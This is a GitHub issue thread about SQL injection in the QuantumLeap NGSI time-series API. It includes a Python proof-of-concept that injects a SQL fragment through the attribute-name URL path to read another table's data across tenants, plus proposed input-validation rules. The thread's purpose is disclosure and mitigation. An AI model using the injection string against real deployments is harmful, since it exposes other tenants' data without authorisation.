ngsi-timeseries-api
ngsi-timeseries-api copied to clipboard
SQL injection, our old nemesis
Background
At the moment QL builds queries by string manipulation---input parameter substitution in string templates, string concatenation, etc. In addition to that, not all input parameters get sanitised so SQL injection is a very real threat. We've been discussing this for a while (see e.g. #165 and this comment about SQL injection, #164, and #295) and have been hoping we would one day move away from string manipulation to an AST-based solution or an ORM like SQL Alchemy. While we managed to implement an AST for geo-queries and sanitise some input params (e.g. datetimes, see #315), we haven't had the time and resources to tackle fully the big honking query in the translator.
Bottom line
Exposing QL as a public endpoint is not a good idea if you're concerned about security. Ideally, QL would sit in a private network and be called by other services with "proper" input parameters. See #295 about it.
Silver lining
Sanitising all query parameters (not only fromDate
/toDate
) would already go a long way to prevent SQL injection. This shouldn't be too hard to do, but will take some more time and testing.
Proposed solution
AST, ORM, and sanitising input parameters + proper use of prepared statements with SQL query params are the options on the table at the moment. (Note: we gave it a shot with SQL Alchemy while working on #315 but got stuck on geo-queries...)
Example
Here's a script where we trick QL to return data that supposedly the client doesn't have access to. There are two tables, test_device
and secret_device
. The client should only be able to query test_device
but the script sneakily injects a SQL snippet to get data from secret_device
while querying test_device
by using attr_name
as an attack vector. Notice that requiring the client to specify FiWare service and service path headers won't help---i.e. you can easily get data from tenants you shouldn't have access to. This isn't a sophisticated attack and I bet you much more might be possible---e.g. drop DB---but I didn't have time to find out...
import json
import random
import requests
# QL_HOST = os.environ.get('QL_HOST', "quantumleap")
QL_HOST = "localhost"
QL_PORT = 8668
QL_URL = f"http://{QL_HOST}:{QL_PORT}/v2"
def gen_entity(entity_id, entity_type):
return {
'id': entity_id,
'type': entity_type,
'a_number': {
'type': 'Number',
'value': 50 * random.uniform(0, 1)
}
}
def gen_notification(entities):
return {
'subscriptionId': str(random.randint(1, 2**64)),
'data': entities
}
def post_notification(payload, fw_svc=None, fw_path=None):
url = f"{QL_URL}/notify"
headers = {'Content-Type': 'application/json'}
if fw_svc:
headers.update({'fiware-service': fw_svc})
if fw_path:
headers.update({'fiware-servicepath': fw_path})
body = json.dumps(payload)
return requests.post(url, headers=headers, data=body)
def load_data():
entities = [gen_entity('e:1', 'test_device'),
gen_entity('e:2', 'secret_device')]
msg = gen_notification(entities)
post_notification(msg)
def query_url(etype, attr_name):
url = "{qlUrl}/types/{entityType}/attrs/{attrName}"
return url.format(
qlUrl=QL_URL,
entityType=etype,
attrName=attr_name,
)
def test_sql_injection():
load_data()
attack_vector = 'a_number" FROM etsecret_device; -- '
r = requests.get(query_url('test_device', attack_vector))
print(r.json())
Maybe by checking "compliancy" we can solve it: allowed characters are the ones in the plain ASCII set, except the following ones: control characters, whitespace, &, ?, / and #.
Being careful that for servicePath / and # are ok values (so maybe we need a validator for that)
Things to be validated:
- entityId
- entityType
- attrName
- service
- servicePath
[1] http://telefonicaid.github.io/fiware-orion/api/v2/stable/ (see field syntax restrictions) [2] https://fiware-orion.readthedocs.io/en/master/user/forbidden_characters/index.html
Stale issue message
What is the status and has this been fixed in the meantime?
at the time being, this relates only to data insert that should happens only by trusted parties. while technically the sanitisation is not per se difficult, it may slow down injection. so we have invested on this so far.
on the query side, which is the part that should be exposed to third parties (also not trusted), this was handled already.